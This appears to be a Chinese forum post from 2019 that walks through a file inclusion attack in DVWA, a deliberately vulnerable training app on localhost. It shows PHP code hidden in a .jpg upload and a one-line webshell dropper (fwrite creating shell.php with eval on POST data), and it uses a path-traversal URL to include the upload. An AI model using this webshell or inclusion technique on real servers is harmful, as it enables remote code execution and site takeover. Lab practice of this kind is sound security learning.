文件包含
本帖最后由 bailancheng 于 2019-10-17 20:41 编辑文件包含漏洞
PHP解析漏洞:
01.txt是一个正常的文本文件,但文件内容却是符合PHP语法的代码:
在记事本中写入下面这段代码,保存成jpg文件。
<?php
phpinfo();
?>
利用文件包含漏洞包含01.txt,其中的代码被正确执行了。
将01.txt的扩展名改为jpg、rar、doc、xxx等,都可以执行。
只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析
接下来开始输入一句话木马:
<?php
fwrite(fopen("shell.php","w"),’<?php eval($_POST); ?>’);
?>
开始上传:
首先将级别改为最高,然后开始上传
点击上传后:
在\AppServ\www\dvwa\vulnerabilities\fi目录中生成shell.php文件,文件内容正是一句话木马。
接下来修改漏洞级别为low使用文件上传,通过文件包含漏洞执行jpg文件中的代码
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/ma.jpg
测试shell.php:
什么都不显示表示有这个目录,已经生成了
页:
[1]